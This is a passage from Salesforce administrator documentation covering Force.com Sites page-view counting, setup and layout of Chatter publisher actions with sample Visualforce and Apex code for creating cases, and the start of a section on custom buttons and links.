billing administrators email notification.

• If your organization exceeds 110% of its page view limit for four consecutive calendar months, your sites are disabled until
the next calendar month begins or you purchase more page views. Also, salesforce.com sends email notification to the site
and billing administrators, as well as the related account executive.

• If, in a given calendar month, your organization reaches 300% of its page view limit, your sites are disabled until the next
calendar month begins or you purchase more page views. Also, salesforce.com sends email notification to the site and
billing administrators, as well as the related account executive.

What Counts as a Page View?

This section describes how page views are counted for sites.

A page view is a request from a non-authenticated site user to load a page associated with one of the sites within your Force.com
domain or custom domain. Requests from authenticated portal users are not counted as page views.

Requests that Count as Page Views
Requests for the following are counted as page views:

Example URLRequests for...

http://mycompany.force.comYour Force.com domain

http://mycompany.comYour custom Web address

http://mycompany.force.com/mypageAny page associated with your site

http://mycompany.force.com/UnauthorizedAuthorization Required error page

n/aAJAX requests such as:

• JavaScript remoting (for example, Apex
RemoteAction)

• Visualforce<apex:actionFunction>
• Visualforce <apex:actionPoller>
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Requests that Do Not Count as Page Views
Requests for the following are not counted as page views:

Example URLRequests for...

http://mycompany.force.com/img/force_logo_w09.gifSalesforce images

http://mycompany.force.com/resource/1233771498000/backgroundYour static resources

http://mycompany.force.com/robots.txtRobots.txt

http://mycompany.force.com/favicon.icoFavorite icon

n/aAttachments and Documents

http://mycompany.force.com/BandwidthExceededError pages, apart from Authorization
Required, such as Limit Exceeded and
Maintenance

http://mycompany.force.com/servlet/rtaImageImages included with an HTML field

http://mycompany.force.com/servlet/fileFieldCustom file field

Note:  Limit Exceeded, Maintenance, Page Not Found, and designated Inactive Home pages aren't counted
against page view and bandwidth limits. You can use static resources to brand these pages, but the following
limitations apply:

• Static resources must be 50 KB or smaller in size.
• Static resources must be style sheets (CSS), image files, or JavaScript files.
• You can't use Apex controllers for these pages.
• You can't perform SOQL or DML operations from these pages.

See Also:
Viewing 24-Hour Force.com Sites Usage History
Tracking Your Force.com Site with Google Analytics
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EXTENDING THE REACH OF YOUR ORGANIZATION

USING ACTIONS, CUSTOM BUTTONS, AND LINKS

Working with Buttons, Links, and Actions
Available in: All Editions

User Permissions Needed

“Customize Application”To create or edit buttons, links, and actions:

Working with Buttons and Links

Buttons and links let users interact with Salesforce data and with external websites and services, such as search engines and
online maps. Salesforce includes several standard buttons and links; you can also create custom ones.

• Understanding Custom Buttons and Links
• Defining Custom Buttons and Links
• Custom Button Considerations
• Custom Buttons and Links Fields
• Overriding Standard Buttons and Tab Home Pages
• Useful Custom Buttons and Links

Working with Actions

Actions let users do tasks, such as create new records, in the Chatter publisher.

• Publisher Actions Overview
• Setting Up Publisher Actions
• Creating Object-Specific Actions
• Creating Global Actions
• Customizing Publisher Actions with the Action Layout Editor
• Customizing Chatter Publisher Actions Using the Enhanced Page Layout Editor
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USING ACTIONS

Publisher Actions Overview
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

The publisher actions feature lets you create actions and add them to the Chatter publisher on the home page, the Chatter
tab, and record detail pages. It also allows you to customize the order in which the standard Chatter actions appear, including
Post, File, Link, and Poll.

Actions let users do more in Chatter, like create records directly in the feed. There are two general types of actions: create
actions and custom actions.

• Create actions let users create records. They’re different from the New button on object tabs and the Quick Create and
Create New features on the home page. Create actions respect your validation rules and field requiredness, and you can
choose each action’s fields.

• Custom actions are Visualforce pages with functionality you define. For example, you might create a custom action to let
users write comments longer than 1000 characters.

For both types of actions, you can create either object-specific actions or global actions.

• Object-specific create actions let users create records that are automatically associated with related records. For example,
you might set up an object-specific action on account to allow users to create contacts. If a user creates a contact on the
detail page for Acme, Inc., that contact will automatically be associated with Acme. You can only add an object-specific
action to page layouts for that object.

When a user creates a record using an object-specific create action, a feed item for that record appears:

◊ In the feed for the record on which the new record was created.

◊ As the first entry in the feed for the new record.

◊ In the Chatter feed of the user who created the record.

◊ In the user profile feed for the user who created the record.

◊ In the Chatter feed of any users who follow the record on which the new record was created.

◊ In the Chatter feed of any users who, through custom triggers or auto-follow rules for new records, automatically follow
the new record.

• Object-specific custom actions let users interact with or create records that have a relationship to an object record. The
Visualforce page for an object-specific custom action must include the standard controller for the relevant object. For
example, if you want to create a custom action that lets users import a contact’s Twitter profile and add that information
to a contact record, you need to use the standard contact controller.

• Global create actions let users create object records, but there’s no automatic relationship between the record that’s created
and any other record. You can add global actions to page layouts for the home page, the Chatter tab, and object detail
pages.

• Create a global custom action for tasks that don’t require users to interact with or create records that have a relationship to
a specific object. Visualforce pages you want to use as global custom actions can’t use standard controllers. For example, if
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you want to create a custom action that lets users enter a street address and see a map, the local time, and the local weather,
create a Visualforce page that doesn’t use any of the standard controllers, and add it as a custom global action.

Supported Objects
You can create object-specific actions on these objects:

• Account
• Campaign
• Case
• Contact
• Custom objects
• Lead
• Opportunity

You can create actions that let users create these kinds of records:

• Account
• Campaign
• Case
• Contact
• Contract
• Custom objects
• Event (without invitees)
• Lead
• Opportunity
• Task

Note:  When you create an object-specific action, you can choose as a target object only event, task, or any object
that has a parent-child or lookup relationship to the host object.

See Also:
Setting Up Publisher Actions
Publisher Actions Best Practices

Setting Up Publisher Actions
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Application”To set up publisher actions:

The publisher actions feature lets you create actions and add them to the Chatter publisher on the home page, the Chatter
tab, and record detail pages. It also allows you to customize the order in which the standard Chatter actions appear, including
Post, File, Link, and Poll. To set up publisher actions:
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1. Enable feed tracking for any objects for which you want to be able to use publisher actions.
2. Enable publisher actions.
3. Create object-specific actions or global actions.
4. Customize the layout of the action, choosing the fields users see when they use it.
5. Add the action to the Chatter publisher on the page layouts you choose.

See Also:
Customizing Chatter Feed Tracking
Publisher Actions Best Practices

Enabling Publisher Actions

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Application”To enable actions in the publisher:

Enabling publisher actions lets you add actions you’ve created to Chatter publishers on the home page, Chatter tab, and record
detail pages. With this setting enabled, you can also customize the order in which all actions appear, including Post, File,
Link, and Poll.

1. From Setup, click Customize > Chatter > Settings.
2. Click Edit.
3. Select Enable Publisher Actions.
4. Click Save.

See Also:
Setting Up Publisher Actions
Publisher Actions Overview
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Enabling Feed Items for Related Records

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Application”To change feed tracking settings

With publisher actions, you can opt to show feed items on a record detail page when related records are created. For example,
the feed on an account record could include feed items for newly created related tasks, events, and contacts, in addition to feed
items for activity on the account itself. This lets users see a more complete view of the activity on and related to a particular
record.

To enable this setting:

1. If you haven’t already, enable publisher actions.
2. From Setup, click Customize > Chatter > Feed Tracking.
3. Click the object for which you want to enable feed items for related records.
4. Click All Related Objects.

This option is available only on these objects:

• Account
• Campaign
• Case
• Contact
• Custom objects
• Lead
• Opportunity

5. Click Save.

With this option enabled, users will see feed items whenever related records are created, regardless of how they’re created.

See Also:
Enabling Publisher Actions
Setting Up Publisher Actions
Publisher Actions Overview
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Creating Object-Specific Actions

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Application”To create actions:

Object-specific create actions let users create records that are automatically associated with related records. For example, you
might set up an object-specific action on account to allow users to create contacts. If a user creates a contact on the detail page
for Acme, Inc., that contact will automatically be associated with Acme.

Object-specific custom actions let users interact with or create records that have a relationship to an object record. The Visualforce
page for an object-specific custom action must include the standard controller for the relevant object. For example, if you want
to create a custom action that lets users import a contact’s Twitter profile and add that information to a contact record, you
need to use the standard contact controller.

To create object-specific actions:

1. From Setup, click Customize, choose the object for which you want to create an action, and click Buttons, Links, and
Actions.

2. Click New Action.
3. Select the type of action you want to create: Create a Record or Custom Action.
4. Customize the action:

• For a Create a Record action, select the type of object to create.

◊ If there’s more than one record type for that object, select the one you want to use for records created through this
action.

◊ If there’s more than one relationship between the object on which you’re creating the action and the target object,
select the field you want to populate automatically when a record is created. (For objects with only one relationship,
the Relationship Field is set by default.)

• For a Custom Action, select a Visualforce page to use, and then specify the height of the action window. (The width
is fixed.)

5. Type a label for the action.
This is the text users will see for the action in the publisher menu.

6. If necessary, change the name of the action.
This name is used in the API and managed packages. It must begin with a letter and use only alphanumeric characters
and underscores, and it can’t end with an underscore or have two consecutive underscores. Unless you’re familiar with
working with the API, we suggest not editing this field.

7. Type a description for the action.
The description appears on the detail page for the action and in the list on the Buttons, Links, and Actions page; it’s not
visible to your users. If you’re creating several actions on the same object, we recommend using a detailed description, such
as “Create Contact on Account using New Client record type.”

8. Optionally, click Change Icon to select a different icon for the action.
This icon appears only when you use the action through the API.

9. Click Save.
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After you create an action, customize the layout of the action to choose the fields users see when they use it, add any predefined
values on page 3484, then add the action to page layouts on page 3487.

Tip:  If you delete an action, it is automatically removed from all layouts it’s assigned to.

See Also:
Creating Global Actions
Creating Visualforce Pages to Use as Custom Publisher Actions
Setting Up Publisher Actions
Publisher Actions Best Practices

Creating Global Actions

User Permissions Needed

“Customize Application”To create actions:

Global create actions let users create object records, but there’s no automatic relationship between the record that’s created and
any other record. You can add global actions to page layouts for the home page, the Chatter tab, and object detail pages.

Create a global custom action for tasks that don’t require users to interact with or create records that have a relationship to a
specific object. Visualforce pages you want to use as global custom actions can’t use standard controllers. For example, if you
want to create a custom action that lets users enter a street address and see a map, the local time, and the local weather, create
a Visualforce page that doesn’t use any of the standard controllers, and add it as a custom global action.

1. From Setup, click Create > Global Actions
2. Click New Action.
3. Select the type of action you want to create: Create a Record or Custom Action.
4. Customize the action:

• For a Create a Record action, select the type of object to create. If there’s more than one record type for that object,
select the one you want to use for records created through this action.

• For a Custom Action, select a Visualforce page to use, and then specify the height of the action window. (The width
is fixed.)

5. Type a label for the action.
This is the text users will see for the action in the publisher menu.

6. If necessary, change the name of the action.
This name is used in the API and managed packages. It must begin with a letter and use only alphanumeric characters
and underscores, and it can’t end with an underscore or have two consecutive underscores. Unless you’re familiar with
working with the API, we suggest not editing this field.

7. Type a description for the action.
The description appears on the detail page for the action and in the list on the Buttons, Links, and Actions page; it’s not
visible to your users. If you’re creating several actions on the same object, we recommend using a detailed description, such
as “Create Contact on Account using New Client record type.”
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8. Optionally, click Change Icon to select a different icon for the action.
This icon appears only when you use the action through the API.

9. Click Save.

After you create an action, customize the layout of the action to choose the fields users see when they use it, add any predefined
values on page 3484, then add the action to page layouts on page 3487.

Tip:  If you delete an action, it is automatically removed from all layouts it’s assigned to.

See Also:
Creating Object-Specific Actions
Creating Visualforce Pages to Use as Custom Publisher Actions
Publisher Actions Overview
Setting Up Publisher Actions

Creating Visualforce Pages to Use as Custom Publisher Actions

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

The publisher actions feature lets you create actions and add them to the Chatter publisher on the home page, the Chatter
tab, and record detail pages. It also allows you to customize the order in which the standard Chatter actions appear, including
Post, File, Link, and Poll. You can create two different kinds of actions: create actions, which allow users to create records,
and custom actions. Custom actions are Visualforce pages with functionality you define. For example, you might create a custom
action to let users write comments longer than 1000 characters.

Object-Specific Custom Actions

Object-specific custom actions let users interact with or create records that have a relationship to an object record. The Visualforce
page for an object-specific custom action must include the standard controller for the relevant object. For example, if you want
to create a custom action that lets users import a contact’s Twitter profile and add that information to a contact record, you
need to use the standard contact controller.

The following code sample shows a Visualforce page designed to be used as a custom action on the account object. This action
lets users create cases from account detail pages, and it has a different user interface from standard create actions.

<apex:page standardcontroller="Account" extensions="CreateCaseExtension" showHeader="false">

<script type='text/javascript' src='/canvas/sdk/js/publisher.js'/>
<style>

.requiredInput .requiredBlock, .requiredBlock {background-color: white;}

.custompubblock div {display: inline-block;}

.custompublabel {width:54px;}
</style>

<script>
function refreshFeed() {

Sfdc.canvas.publisher.publish({name : 'publisher.refreshFeed', payload : {}});
}
</script>
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<div>
<apex:form >

<apex:actionFunction action="{!createCase}" name="createCase" rerender="out"
oncomplete="refreshFeed();"/>
<apex:outputPanel id="out" >

<div class="custompubblock">
<div class="custompublabel">Account:</div><apex:inputField

value="{!theCase.accountId}"
style="margin-left:0;"/>&nbsp;&nbsp;&nbsp;
<div>Contact:&nbsp;</div><apex:inputField value="{!theCase.contactId}"

/>
</div>
<apex:inputField value="{!theCase.description}"

style="width:538px;height:92px;margin-top:4px;" />
<div class="custompubblock" style="margin-top:5px;">

<div >Status:&nbsp;</div><apex:inputField value="{!theCase.status}"
/>&nbsp;&nbsp;&nbsp;

<div >Priority:&nbsp;</div><apex:inputField value="{!theCase.priority}"
/>&nbsp;&nbsp;&nbsp;

<div >Case Origin:&nbsp;</div><apex:inputField value="{!theCase.origin}"
/>

</div>
</apex:outputPanel>

</apex:form><br/>
<button type="button" onclick="createCase();"
style="position:fixed;bottom:0px;right:0px;padding:5px 10px;
font-size:13px; font-weight:bold; line-height:
18px;background-color:#0271BF;background-image:-moz-linear-gradient(#2DADDC,

#0271BF);background-repeat:repeat-x;border-color:#096EB3;"
id="addcasebutton">Create Case</button>

</div>
</apex:page>

Global Custom Actions

Create a global custom action for tasks that don’t require users to interact with or create records that have a relationship to a
specific object. Visualforce pages you want to use as global custom actions can’t use standard controllers. For example, if you
want to create a custom action that lets users enter a street address and see a map, the local time, and the local weather, create
a Visualforce page that doesn’t use any of the standard controllers, and add it as a custom global action.

The following code sample shows a Visualforce page designed to be used as a custom action on any object that supports
publisher actions. This action lets users create cases from record detail pages, Chatter, or the home page, and it has a different
user interface from standard create actions. As with all global actions, the records created through this action are not automatically
associated with any other records.

<!-- Custom controller -->
public with sharing class CreateCaseController {

public Case theCase {get; set;}
public String lastError {get; set;}
public CreateCaseController() {

theCase = new Case();
lastError = '';

}

public PageReference createCase() {
createNewCase();
theCase = new Case();
return null;

}

private void createNewCase() {
try {
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insert theCase;

FeedItem post = new FeedItem();
post.ParentId = ApexPages.currentPage().getParameters().get('id');
post.Body = 'created a case';
post.type = 'LinkPost';
post.LinkUrl = '/' + theCase.id;
post.Title = theCase.Subject;
insert post;

} catch(System.Exception ex){
lastError = ex.getMessage();

}
}

}

<apex:page controller="CreateCaseController" showHeader="false">
<script type='text/javascript' src='/canvas/sdk/js/publisher.js'/>
<style>

.requiredInput .requiredBlock, .requiredBlock {background-color: white;}

.custompubblock div {display: inline-block;}

.custompublabel {width:54px;}
</style>

<script>
function refreshFeed() {

Sfdc.canvas.publisher.publish({name : 'publisher.refresh', payload : {feed:
true}});

}
</script>

<div>
<apex:form >

<apex:actionFunction action="{!createCase}" name="createCase" rerender="out"
oncomplete="refreshFeed();"/>

<apex:outputPanel id="out" >
<div class="custompubblock">

<div>Subject:&nbsp;</div><apex:inputField value="{!theCase.subject}"
style="width:500px;" />

</div>
<div class="custompubblock">

<div class="custompublabel">Account:</div><apex:inputField
value="{!theCase.accountId}"

style="margin-left:0;"/>&nbsp;&nbsp;&nbsp;
<div>Contact:&nbsp;</div><apex:inputField value="{!theCase.contactId}"

/>
</div>
<apex:inputField value="{!theCase.description}"

style="width:500px;height:92px;margin-top:4px;" />
<div class="custompubblock" style="margin-top:5px;">

<div>Status:&nbsp;</div><apex:inputField value="{!theCase.status}"
/>&nbsp;&nbsp;&nbsp;

<div>Priority:&nbsp;</div><apex:inputField value="{!theCase.priority}"
/>&nbsp;&nbsp;&nbsp;

<div>Case Origin:&nbsp;</div><apex:inputField value="{!theCase.origin}"
/>

</div>
<div style="color:red;">{!lastError}</div>

</apex:outputPanel>
</apex:form><br/>
<button type="button" onclick="createCase();"

style="position:fixed;bottom:0px;right:0px;padding:5px 10px;
font-size:13px; font-weight:bold; line-height:
18px;background-color:#0271BF;background-image:-moz-linear-gradient(#2DADDC,

#0271BF);background-repeat:repeat-x;
border-color:#096EB3;" id="addcasebutton">Create Case</button>
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</div>
</apex:page>

See Also:
Creating Object-Specific Actions
Creating Global Actions
Publisher Actions Overview

Setting Predefined Field Values for Publisher Actions
When you create publisher actions, use predefined field values to set a value for a field. Predefined values can help ensure
consistency and make it faster and easier for users to create records.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Applications”To set predefined field values:

If you predefine values for fields on object records created through an action, you don’t need to add those fields to the action
layout. For example, on an action that lets users create opportunities, you might set Prospecting as the predefined value for
the Stage field. All new opportunities created through that action will automatically be assigned to the prospecting stage.

To set predefined field values:

1. Click the name of an action in the Buttons, Links, and Actions list or the Global Actions list.
2. On the action detail page, click New in the Predefined Field Values list.
3. Select the field you want to predefine a value for.
4. Specify the value for the field.
5. Click Save.

Tip:  On object-specific actions, the predefined value can include references to the source record fields.

See Also:
Notes on Predefined Field Values for Publisher Actions
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Notes on Predefined Field Values for Publisher Actions

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

Setting predefined field values for actions is especially important if you remove required or Always on Layout fields from
the action layout.

• You can set predefined values for any field available in the action layout editor, with these exceptions:

◊ rich text area fields
◊ lookup and master-detail
◊ multi-select picklists
◊ read-only field types like auto-number, formula, and roll-up summary fields

• If a field on an action has both a predefined value and a default value set, the action uses the predefined value, not the
default value.

• If you set a predefined value for a field and leave it on the action layout, the predefined value displays as a default value for
the field in the publisher.

• If you have a required field with a predefined value assigned, and have removed the field from the action layout, if you later
delete the field’s predefined value you need to re-add the required field to the action layout. Otherwise, users won’t be able
to save the record.

See Also:
Setting Predefined Field Values for Publisher Actions

CUSTOMIZING ACTIONS

Publisher Action Layout Editor Overview
Actions let users do more in Chatter, like create records directly in the feed. The action layout editor allows administrators to
add, remove, and reorder fields on an action.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

In the action layout editor, you can choose which fields appear for each action. For example, a Post action has one large text
area for user input. An object-related create action, on the other hand, must include many fields in order for the record to be
created properly.

When you first create a publisher action, its layout is populated with a default set of fields. Use the action layout editor to
specify which fields to include in the layout. You can add and remove fields, or simply reorder them on the layout.
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The action layout editor has two parts: a palette on the upper section of the screen and the action layout below it. The palette
contains fields from the action’s target object that you can add to the action layout. However, the following field types aren’t
supported, and won’t show up in the palette:

• Rich text area fields

• Record type fields

• Read-only field types such as roll-up summary, formula, and auto-number fields

• Read-only system fields such as Created By or Last Modified By

Note:  If you convert a field’s type from one that is supported for actions to a type that isn’t supported, the field is
removed from the action layout. If you convert the field back to a supported type without changing the action layout,
the field is automatically added back onto the layout. If you’ve edited the layout and then convert the field back to a
supported type, you must add the field back onto the layout manually.

Fields that are already on the action layout still appear on the palette but are inactive. When you click an inactive field on the
palette, Salesforce highlights the field on the action layout.

Action layout customization is tracked in the setup audit trail history.

See Also:
Customizing Publisher Actions with the Action Layout Editor
Publisher Actions Overview

Customizing Publisher Actions with the Action Layout
Editor

When you first create a publisher action, its layout is populated with a default set of fields. Use the action layout editor to
specify which fields to include in the layout. You can add and remove fields, or simply reorder them on the layout.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

The first time you view a publisher action’s layout, certain fields are pre-populated: target object default fields, standard required
fields, and any custom universally required fields.

• To add a field to the action layout, select and drag the field from the palette to the layout.

Tip: There is no hard limit to the number of fields you can add to an action layout. However, for optimum
usability, we recommend a maximum of 8 fields. Adding more than 20 fields can severely impact user efficiency.
To reduce the number of fields in your layout, you can create predefined values for the required fields, and then
remove those fields from your layout. You can set predefined field values from the action detail page.
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• To remove a field from the action layout, drag the field from the action layout to the right side of the palette, or hover over
the field and click .

You can remove a required field from the action layout, but make sure the field has a predefined value. Otherwise, users
won’t be able to create new records.

• To quickly locate any item in the palette, use the Quick Find box. The Quick Find box is especially useful for actions that
have large numbers of fields available in the palette.

• In Enterprise, Unlimited, and Developer Editions, click Preview As to preview the action layout as different types of users.

• To make a field read-only or required for the action, either double-click the field in the action layout or hover over the
field and click . You can’t change the properties of fields from the palette.

• To save your changes and continue editing the action layout, click Quick Save.

• To save your changes when you are done customizing the action layout, click Save. If you navigate away from your action
layout before clicking Save, you will lose your changes.

Tip:

• Use the undo and redo buttons to step backwards and forwards, respectively.
• Use these keyboard shortcuts.

◊ Undo = CTRL+Z
◊ Redo = CTRL+Y
◊ Quick Save = CTRL+S

See Also:
Publisher Action Layout Editor Overview

Customizing Chatter Publisher Actions Using the Enhanced
Page Layout Editor

The publisher actions feature lets you create actions and add them to the Chatter publisher on the home page, the Chatter
tab, and record detail pages. It also allows you to customize the order in which the standard Chatter actions appear, including
Post, File, Link, and Poll. Use the page layout editor to customize the actions in the publisher.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Application”To create actions:

To customize action layouts and page layouts:

“View Setup”To view page layouts:

You can customize actions in the Chatter publisher for object detail pages from Customize > Object > Page Layouts.

3487

Customizing Chatter Publisher Actions Using the Enhanced
Page Layout Editor

Extending the Reach of Your Organization



To customize the publisher actions for global pages, such as Home, Chatter Home, and User Profile, see Working with Global
Publisher Layouts on page 3488.

• To add an action to the Chatter publisher, select the action on the palette and drag it to the Chatter Feed section.

To select multiple elements individually, use CTRL+click. To select multiple elements as a group, use SHIFT+click.

Tip:  Hover over an action in the palette to see its label, API name, action type, and target object.

• To remove an action from the publisher, select it and drag it back to the palette.

• To reorder actions on the publisher, select them and drag them into a new position.

Note: Because adding too many actions can cause the page to load slowly, we recommend including no more than
nine actions total in each publisher, including any standard actions. If you include five or more actions in a publisher,
three are shown and the rest are added to the publisher’s More menu. If you include four or fewer actions, they’re all
shown.

If you haven’t customized the publisher actions on a page layout, the actions default to those on the global publisher layout.
If a page layout is using the global publisher layout settings, you can override them.

• To override the global layout settings on a page layout, click override the global layout from the text in the Chatter Feed
section or click . Upon overriding, the publisher actions default to the standard actions—Post, File, Link, Poll—regardless
of what actions were assigned to the global publisher layout.

• To revert the publisher actions to those of the global publisher layout, hover over the publisher actions section and click
.

See Also:
Setting Up Publisher Actions
Customizing Page Layouts with the Enhanced Page Layout Editor

Working with Global Publisher Layouts
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Application”To create actions:

To customize action layouts and page layouts:

“View Setup”To view page layouts:

You can create global publisher layouts for Chatter feeds on global pages such as Home, Chatter Home, and User Profile.
Global publisher layouts can be composed only from global actions.  After creating global publisher layouts, you can assign
them to different user profiles, which lets you customize which actions the users under different profiles see by default in their
Chatter feeds on the global pages.

These are the steps involved in working with global publisher layouts:
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1. Create the global publisher layout.
2. Customize the global publisher layout.
3. Assign the global publisher layout to user profiles.

See Also:
Creating Global Actions

Creating Global Publisher Layouts

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Application”To create actions:

To customize action layouts and page layouts:

“View Setup”To view page layouts:

You can create global publisher layouts for Chatter feeds on global pages such as Home, Chatter Home, and User Profile.
Global publisher layouts can be composed only from global actions.

1. From Setup, click Customize > Chatter > Publisher Layouts.
2. To create a new global publisher layout, click New.
3. To clone a publisher layout, select one from the Existing Global Publisher Layout drop-down.
4. Enter a name for the new global publisher layout.
5. Click Save.

After you have a global publisher layout defined, the publisher layout editor opens, and you can customize the publisher by
adding, removing, or reordering actions.

See Also:
Assigning Global Publisher Layouts to User Profiles
Working with Global Publisher Layouts
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Customizing Global Publisher Layouts

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Application”To create actions:

To customize action layouts and page layouts:

“View Setup”To view page layouts:

After creating a new global publisher layout, you can add, delete, and reorder the actions on the layout to change the way the
Chatter publisher appears to users. Or, you can edit existing global publisher layouts by clicking Edit next to their name on
the Global Publisher Layout list page.

Once in the publisher layout editor:

• Add actions to the global publisher layout by dragging them from the palette. To select multiple elements individually,
use CTRL+click. To select multiple elements as a group, use SHIFT+click.

• To remove an action, select it and drag it back to the palette.

• To reorder actions, select an action and drag it into a new position.

• To save your changes and continue editing the global publisher layout, click Quick Save.

• To save your changes when you’re done customizing the global publisher layout, click Save. If you navigate away before
clicking Save, you will lose your changes.

• To create a copy of your global publisher layout, click Save and select Save As.

Tip:

• Use the undo and redo buttons to step backwards and forwards, respectively.
• Use these keyboard shortcuts.

◊ Undo = CTRL+Z
◊ Redo = CTRL+Y
◊ Quick Save = CTRL+S

After you have defined a global publisher layout, click Publisher Layout Assignment to assign it to user profiles.

See Also:
Working with Global Publisher Layouts
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Assigning Global Publisher Layouts to User Profiles

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

User Permissions Needed

“Customize Application”To create actions:

To customize action layouts and page layouts:

“View Setup”To view page layouts:

Once you finish creating a global publisher layout, you can assign it to different user profiles.

For example, a Marketing User and a Standard User might need different actions in the Chatter publisher. Create multiple
global publisher layouts and assign them to different user profiles to customize the publisher actions for each profile.

1. From the Global Publisher Layout list page, click Publisher Layout Assignment.
2. Click Edit Assignment.
3. Select a user profile by clicking anywhere on its row in the table.

You can assign a global publisher layout to multiple profiles by using SHIFT+click to select adjacent profiles and CTRL+click
to select non-adjacent profiles.

4. From the Publisher Layout to Use drop-down, select the global publisher layout that you want to assign to the highlighted
profile.

5. Click Save.

See Also:
Customizing Global Publisher Layouts
Working with Global Publisher Layouts

Publisher Actions Best Practices
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

The publisher actions feature lets you create actions and add them to the Chatter publisher on the home page, the Chatter
tab, and record detail pages. It also allows you to customize the order in which the standard Chatter actions appear, including
Post, File, Link, and Poll. Use these tips as you set up publisher actions to make the feature easy to use and easy to maintain.

Tips for Creating Actions

• Actions labels longer than approximately 12-14 characters are shortened when they’re displayed in the publisher, so try to
keep these labels short but descriptive.

• Use the Description field to create notes for yourself about each action. This is especially useful if you’re creating several
similar actions for different record types, for example. The description appears in the list of buttons, links, and actions for
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object-specific actions, or in the list of global actions, as well as on the detail page for the action. Your notes aren’t visible
to users.

• Limit the height of custom actions to 400 pixels so they display correctly in the publisher.

Tips for Laying Out Actions

• To make it easy for your users to create records using actions in the publisher, we recommend limiting the number of fields
you include in action layouts.

• To create a single-column layout, such as for display on mobile devices, add fields only in the left column.
• Use predefined field values to set standard values for common fields. For example, on an action that lets users create

opportunities, you might set Prospecting as the predefined value for the Stage field. All new opportunities created through
that action will automatically be assigned to the prospecting stage. If you predefine values for fields on object records created
through an action, you don’t need to add those fields to the action layout.

• Use the Preview As... button on the Action Layout Editor to see how a layout will appear to different user profiles.

Tips for Adding Actions to Publishers

• Because adding too many actions can cause the page to load slowly, we recommend including no more than nine actions
total in each publisher, including any standard actions.

• If you include five or more actions in a publisher, three are shown and the rest are added to the publisher’s More menu.
If you include four or fewer actions, they’re all shown.

See Also:
Troubleshooting Publisher Actions
Setting Up Publisher Actions

Troubleshooting Publisher Actions
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Database.com, and Developer Editions

I don’t see feeds on record detail pages for a certain object.

Feeds appear only for objects for which you’ve enabled feed tracking.

I see the feed on a record detail page, but I don’t see a publisher.

If there are no actions in the publisher on a page layout, the publisher won’t appear. Add at least one action to the publisher
for it to appear.

I can create actions, but I can’t add them to publishers.

You need to enable publisher actions in order to be able to add actions to publishers.

I’m using Internet Explorer 10, and all the actions I’ve created appear in the publisher with the same icon, even
though the actions are for different types of objects.

Internet Explorer version 10 doesn’t support the techniques Salesforce uses to show icons that correspond to the type of object
an action is associated with. Consider using Chrome, Firefox, Safari, or an earlier version of Internet Explorer.
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I’ve added an action to a page layout, but a user assigned to the profile that uses that page layout can’t see the
action.

Be sure the user has both Read and Edit permission on the action’s relationship field. The relationship field is the field that’s
automatically populated on the target object when a user creates a record using an action. For example, for an action on case
that lets users create child cases, the default relationship field is Parent Case. To be sure users can see the Create Child Case
action, check that they have both Read and Edit permission on the Parent Case field.

I don’t see a relationship field on my global create actions.

Relationship fields apply only to object-specific create actions, not to global actions.

See Also:
Publisher Actions Best Practices
Setting Up Publisher Actions

USING CUSTOM BUTTONS AND LINKS

Understanding Custom Buttons and Links
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To create or change custom buttons or links:

Create custom buttons and links to integrate Salesforce data with external URLs, applications, your company’s intranet, or
other back-end office systems.

Salesforce supports the following kinds of custom links and custom buttons.

Configured from Setup underType of custom link or custom button

Customize > Home > Home Page ComponentsBookmark-style links defined in the standard custom links
home page component

Customize > Home > Custom LinksFull-featured custom links included in custom home page
components

Customize > Object Name > Buttons, Links, and ActionsFull-featured custom links or custom buttons on standard
objects

Create > ObjectsFull-featured custom links or custom buttons on custom
objects
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Custom links can link to:

• An external URL, such as www.google.com or your company’s intranet.

• A custom s-control in the custom s-control library, such as a Java applet or Active-X control.

Custom buttons can:

• Connect users to external applications, such as a web page that displays a map to a contact's address.

• Run an s-control from the s-control library, such as an s-control that escalates a case from the case detail page.

• Launch custom links.

For both custom links and buttons, you can choose the display window properties that determine how the target of a link or
button is displayed to your users. Custom links and s-controls can include Salesforce fields as tokens within the URL or custom
s-control. For example, you could include an account name in a URL that searches Yahoo.
http://search.yahoo.com/bin/search?p={!Account_Name}.

You can override the default action of some standard buttons and customize the behavior of tab home pages to suit your
organization's needs.

See Also:
Defining Custom Buttons and Links
Adding Default Custom Links
Administrator tip sheet: Building Salesforce Custom Links

Defining Custom Buttons and Links
Custom buttons and links are available in: All Editions except Database.com

Visualforce pages and s-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and
Developer Editions

User Permissions Needed

“Customize Application”To create or change custom buttons or links:

Before creating a custom button or link, determine what action you want to occur when a user clicks it. Consider a Visualforce
page if you want the button or link to launch a custom page or other code.

1. Navigate to the appropriate buttons and links page.

• For standard objects, from Setup, click Customize, select the object or tab link you want and click Buttons, Links,
and Actions.

